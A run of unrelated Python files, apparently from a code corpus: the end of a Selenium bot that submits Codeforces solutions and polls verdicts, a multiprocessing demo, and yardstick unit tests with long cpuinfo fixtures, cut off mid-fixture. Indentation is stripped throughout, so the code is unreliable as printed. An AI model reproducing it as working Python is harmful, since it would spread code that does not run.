outfr, outto = [idx for idx, line in enumerate(samplecpp) if line.endswith('python-autofill-out>\n')]
del samplecpp[outfr + 1:outto]
#
ins, outs = caught[0::2], caught[1::2]
file = solution_format.format(prob_code.lower())
samplecpp[0] = f'//{file} {contestname}\n'
samplecpp[1] = f'//{" ".join(self.prob_codes)}\n'
inject(f'{file}', samplecpp, ins, outs, infr, outfr)
# now preparing the solution
print(f'task {prob_code} prepared')
driver.back()
if autoload:
self.load(prob_code)
def sub(self):
with open(solving, 'r') as f:
got = f.readlines()
_ = solution_format.format(r'(\w+)')
task_code, self.contestname = re.match(fr'//{_} (\w+)', got[0]).groups()
task_code = task_code.lower()
self.prob_codes, *_ = re.match("//([\w+ ]+)", got[1]).groups()
self.prob_codes = self.prob_codes.split()
driver = get_driver()
while driver.current_url != fr'https://codeforces.com/contest/{self.contestname}/submit':
driver.get(fr'https://codeforces.com/contest/{self.contestname}/submit')
selection = driver.find_element_by_name('submittedProblemIndex')
selection.send_keys(task_code)
toggle_editor = driver.find_element_by_class_name('toggleEditorCheckboxLabel') # only for codeforce, multi-character
editor = driver.find_element_by_id('sourceCodeTextarea')
srcfilebrowse_button = driver.find_element_by_name('sourceFile')
while 'inline-block' not in editor.get_attribute('style'):
toggle_editor.click()
# src_file_loc = os.path.abspath(pth.join(os.getcwd(), solving))
self.incl()
editor.send_keys(Keys.CONTROL + 'v')
# print(f"uploading file {src_file_loc}")
# srcfilebrowse_button.send_keys(src_file_loc)
submit = driver.find_element_by_class_name('submit')
while submit.get_attribute('disabled') == 'disabled':
print('submit button disabled')
time.sleep(0.5)
submit.send_keys(Keys.ENTER)
def report():
time.sleep(10)
while True:
time.sleep(1)
driver.refresh()
table = driver.find_element_by_class_name('status-frame-datatable')
lastsubmission = table.find_elements_by_tag_name('tr')[1]
columns = lastsubmission.find_elements_by_tag_name('td')
columns = [c.text for c in columns]
print(f'\r{"|".join(columns[3:])}', end='\r')
verdict = columns[5]
if any(x in verdict for x in ['Happy', 'ccept', 'ceede', 'rror', 'rong', 'assed']):
break
print('finally: ' + lastsubmission.text)
driver.get(fr'https://codeforces.com/contest/{self.contestname}/submit')
self.check_score = Thread(target=report)
self.check_score.start()
if self.prob_codes[-1] != task_code:
try:
self.load(self.prob_codes[self.prob_codes.index(task_code) + 1])
except Exception as e:
print(f'unable to autoload next, either no more next or problem_code not defined:{e}')
self.check_score.join()
def prep(self, contestname):
driver = get_driver()
self.clr()
self.contestname = contestname = str(contestname)
driver.get(f'https://codeforces.com/contest/{contestname}/')
table = driver.find_element_by_class_name('problems')
problems = table.find_elements_by_tag_name('tr')[1:]
problems = [tr.find_element_by_tag_name('td').find_element_by_tag_name('a') for tr in problems]
self.prob_codes = prob_codes = [x.text.lower() for x in problems]
for problink in problems:
problink.send_keys(Keys.CONTROL + Keys.ENTER)
for i, c in enumerate(prob_codes):
self.prept(c, i == 0)
while driver.current_url != fr'https://codeforces.com/contest/{contestname}/submit':
driver.get(fr'https://codeforces.com/contest/{contestname}/submit')
if __name__ == '__main__':
interface(bot_codeforces())
|
run_background_processes_no_daemons_sk.py | import multiprocessing
import time
def foo():
name = multiprocessing.current_process().name
print ("Starting %s \n" %name)
if name == 'bg_process':
for i in range(0,5):
print('---> %d \n' %i)
time.sleep(1)
else:
for i in range(5,10):
print('---> %d \n' %i)
time.sleep(1)
print ("Exiting %s \n" %name)
if __name__ == '__main__':
bg_process = multiprocessing.Process(name='bg_process', target=foo)
bg_process.daemon = False
no_bg_process = multiprocessing.Process(name='no_bg_process', target=foo)
no_bg_process.daemon = False
bg_process.start()
no_bg_process.start() |
test_utils.py | ##############################################################################
# Copyright (c) 2015 Ericsson AB and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
from copy import deepcopy
import errno
import importlib
import ipaddress
from itertools import product, chain
import os
import socket
import time
import threading
import mock
import six
from six.moves import configparser
import unittest
import yardstick
from yardstick import ssh
from yardstick.common import constants
from yardstick.common import utils
from yardstick.common import exceptions
from yardstick.tests.unit import base as ut_base
class IterSubclassesTestCase(ut_base.BaseUnitTestCase):
# Disclaimer: this class is a modified copy from
# rally/tests/unit/common/plugin/test_discover.py
# Copyright 2015: Mirantis Inc.
def test_itersubclasses(self):
class A(object):
pass
class B(A):
pass
class C(A):
pass
class D(C):
pass
self.assertEqual([B, C, D], list(utils.itersubclasses(A)))
class ImportModulesFromPackageTestCase(ut_base.BaseUnitTestCase):
@mock.patch('yardstick.common.utils.os.walk')
def test_import_modules_from_package_no_mod(self, mock_walk):
yardstick_root = os.path.dirname(os.path.dirname(yardstick.__file__))
mock_walk.return_value = ([
(os.path.join(yardstick_root, 'foo'), ['bar'], ['__init__.py']),
(os.path.join(yardstick_root, 'foo', 'bar'), [], ['baz.txt', 'qux.rst'])
])
utils.import_modules_from_package('foo.bar')
@mock.patch('yardstick.common.utils.os.walk')
@mock.patch.object(importlib, 'import_module')
def test_import_modules_from_package(self, mock_import_module, mock_walk):
yardstick_root = os.path.dirname(os.path.dirname(yardstick.__file__))
mock_walk.return_value = ([
(os.path.join(yardstick_root, 'foo', os.pardir, 'bar'), [], ['baz.py'])
])
utils.import_modules_from_package('foo.bar')
mock_import_module.assert_called_once_with('bar.baz')
class GetParaFromYaml(ut_base.BaseUnitTestCase):
@mock.patch('yardstick.common.utils.os.environ.get')
def test_get_param_para_not_found(self, get_env):
file_path = 'config_sample.yaml'
get_env.return_value = self._get_file_abspath(file_path)
args = 'releng.file'
default = 'hello'
self.assertTrue(constants.get_param(args, default), default)
@mock.patch('yardstick.common.utils.os.environ.get')
def test_get_param_para_exists(self, get_env):
file_path = 'config_sample.yaml'
get_env.return_value = self._get_file_abspath(file_path)
args = 'releng.dir'
para = '/home/opnfv/repos/releng'
self.assertEqual(para, constants.get_param(args))
def _get_file_abspath(self, filename):
curr_path = os.path.dirname(os.path.abspath(__file__))
file_path = os.path.join(curr_path, filename)
return file_path
class CommonUtilTestCase(ut_base.BaseUnitTestCase):
def setUp(self):
self.data = {
"benchmark": {
"data": {
"mpstat": {
"cpu0": {
"%sys": "0.00",
"%idle": "99.00"
},
"loadavg": [
"1.09",
"0.29"
]
},
"rtt": "1.03"
}
}
}
def test__dict_key_flatten(self):
line = 'mpstat.loadavg1=0.29,rtt=1.03,mpstat.loadavg0=1.09,' \
'mpstat.cpu0.%idle=99.00,mpstat.cpu0.%sys=0.00'
# need to sort for assert to work
line = ",".join(sorted(line.split(',')))
flattened_data = utils.flatten_dict_key(
self.data['benchmark']['data'])
result = ",".join(
("=".join(item) for item in sorted(flattened_data.items())))
self.assertEqual(result, line)
def test_get_key_with_default_negative(self):
with self.assertRaises(KeyError):
utils.get_key_with_default({}, 'key1')
@mock.patch('yardstick.common.utils.open', create=True)
def test_(self, mock_open):
mock_open.side_effect = IOError
with self.assertRaises(IOError):
utils.find_relative_file('my/path', 'task/path')
self.assertEqual(mock_open.call_count, 2)
@mock.patch('yardstick.common.utils.open', create=True)
def test_open_relative_path(self, mock_open):
mock_open_result = mock_open()
mock_open_call_count = 1 # initial call to get result
self.assertEqual(utils.open_relative_file('foo', 'bar'), mock_open_result)
mock_open_call_count += 1 # one more call expected
self.assertEqual(mock_open.call_count, mock_open_call_count)
self.assertIn('foo', mock_open.call_args_list[-1][0][0])
self.assertNotIn('bar', mock_open.call_args_list[-1][0][0])
def open_effect(*args, **kwargs):
if kwargs.get('name', args[0]) == os.path.join('bar', 'foo'):
return mock_open_result
raise IOError(errno.ENOENT, 'not found')
mock_open.side_effect = open_effect
self.assertEqual(utils.open_relative_file('foo', 'bar'), mock_open_result)
mock_open_call_count += 2 # two more calls expected
self.assertEqual(mock_open.call_count, mock_open_call_count)
self.assertIn('foo', mock_open.call_args_list[-1][0][0])
self.assertIn('bar', mock_open.call_args_list[-1][0][0])
# test an IOError of type ENOENT
mock_open.side_effect = IOError(errno.ENOENT, 'not found')
with self.assertRaises(IOError):
# the second call still raises
utils.open_relative_file('foo', 'bar')
mock_open_call_count += 2 # two more calls expected
self.assertEqual(mock_open.call_count, mock_open_call_count)
self.assertIn('foo', mock_open.call_args_list[-1][0][0])
self.assertIn('bar', mock_open.call_args_list[-1][0][0])
# test an IOError other than ENOENT
mock_open.side_effect = IOError(errno.EBUSY, 'busy')
with self.assertRaises(IOError):
utils.open_relative_file('foo', 'bar')
mock_open_call_count += 1 # one more call expected
self.assertEqual(mock_open.call_count, mock_open_call_count)
class TestMacAddressToHex(ut_base.BaseUnitTestCase):
def test_mac_address_to_hex_list(self):
self.assertEqual(utils.mac_address_to_hex_list("ea:3e:e1:9a:99:e8"),
['0xea', '0x3e', '0xe1', '0x9a', '0x99', '0xe8'])
def test_mac_address_to_hex_list_too_short_mac(self):
with self.assertRaises(exceptions.InvalidMacAddress):
utils.mac_address_to_hex_list("ea:3e:e1:9a")
def test_mac_address_to_hex_list_no_int_mac(self):
with self.assertRaises(exceptions.InvalidMacAddress):
utils.mac_address_to_hex_list("invalid_mac")
class TranslateToStrTestCase(ut_base.BaseUnitTestCase):
def test_translate_to_str_unicode(self):
input_str = u'hello'
output_str = utils.translate_to_str(input_str)
result = 'hello'
self.assertEqual(result, output_str)
def test_translate_to_str_dict_list_unicode(self):
input_str = {
u'hello': {u'hello': [u'world']}
}
output_str = utils.translate_to_str(input_str)
result = {
'hello': {'hello': ['world']}
}
self.assertEqual(result, output_str)
def test_translate_to_str_non_string(self):
input_value = object()
result = utils.translate_to_str(input_value)
self.assertIs(input_value, result)
class TestParseCpuInfo(ut_base.BaseUnitTestCase):
def test_single_socket_no_hyperthread(self):
cpuinfo = """\
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel Core Processor (Haswell, no TSX)
stepping : 1
microcode : 0x1
cpu MHz : 2294.684
cache size : 4096 KB
physical id : 0
siblings : 5
core id : 2
cpu cores : 5
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
bugs :
bogomips : 4589.36
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel Core Processor (Haswell, no TSX)
stepping : 1
microcode : 0x1
cpu MHz : 2294.684
cache size : 4096 KB
physical id : 0
siblings : 5
core id : 3
cpu cores : 5
apicid : 3
initial apicid : 3
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
bugs :
bogomips : 4589.36
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel Core Processor (Haswell, no TSX)
stepping : 1
microcode : 0x1
cpu MHz : 2294.684
cache size : 4096 KB
physical id : 0
siblings : 5
core id : 4
cpu cores : 5
apicid : 4
initial apicid : 4
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
bugs :
bogomips : 4589.36
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
"""
socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
self.assertEqual(sorted(socket_map.keys()), [0])
self.assertEqual(sorted(socket_map[0].keys()), [2, 3, 4])
def test_single_socket_hyperthread(self):
cpuinfo = """\
processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz
stepping : 3
microcode : 0x1d
cpu MHz : 3501.708
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 1
cpu cores : 4
apicid : 3
initial apicid : 3
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm epb tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida arat pln pts
bugs :
bogomips : 6987.36
clflush size : 64
cache_alignment : 64
address sizes : 39 bits physical, 48 bits virtual
power management:
processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz
stepping : 3
microcode : 0x1d
cpu MHz : 3531.829
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 2
cpu cores : 4
apicid : 5
initial apicid : 5
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm epb tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida arat pln pts
bugs :
bogomips : 6987.36
clflush size : 64
cache_alignment : 64
address sizes : 39 bits physical, 48 bits virtual
power management:
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz
stepping : 3
microcode : 0x1d
cpu MHz : 3500.213
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 3
cpu cores : 4
apicid : 7
initial apicid : 7
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm epb tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida arat pln pts
bugs :
bogomips : 6987.24
clflush size : 64
cache_alignment : 64
address sizes : 39 bits physical, 48 bits virtual
power management:
"""
socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
self.assertEqual(sorted(socket_map.keys()), [0])
self.assertEqual(sorted(socket_map[0].keys()), [1, 2, 3])
self.assertEqual(sorted(socket_map[0][1]), [5])
self.assertEqual(sorted(socket_map[0][2]), [6])
self.assertEqual(sorted(socket_map[0][3]), [7])
def test_dual_socket_hyperthread(self):
cpuinfo = """\
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.976
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 1
cpu cores : 22
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4401.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1226.892
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 2
cpu cores : 22
apicid : 4
initial apicid : 4
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4400.84
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 43
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 120
initial apicid : 120
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4411.31
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 44
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 0
cpu cores : 22
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4410.61
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 85
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.573
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 26
cpu cores : 22
apicid : 117
initial apicid : 117
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4409.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 86
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 27
cpu cores : 22
apicid : 119
initial apicid : 119
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4406.62
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 87
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.708
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 121
initial apicid : 121
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4413.48
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
"""
socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
self.assertEqual(sorted(socket_map.keys()), [0, 1])
self.assertEqual(sorted(socket_map[0].keys()), [0, 1, 2])
self.assertEqual(sorted(socket_map[1].keys()), [26, 27, 28])
self.assertEqual(sorted(socket_map[0][0]), [44])
self.assertEqual(sorted(socket_map[0][1]), [1])
self.assertEqual(sorted(socket_map[0][2]), [2])
self.assertEqual(sorted(socket_map[1][26]), [85])
self.assertEqual(sorted(socket_map[1][27]), [86])
self.assertEqual(sorted(socket_map[1][28]), [43, 87])
def test_dual_socket_no_hyperthread(self):
cpuinfo = """\
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.976
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 1
cpu cores : 22
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4401.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1226.892
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 2
cpu cores : 22
apicid : 4
initial apicid : 4
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4400.84
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 43
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 120
initial apicid : 120
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
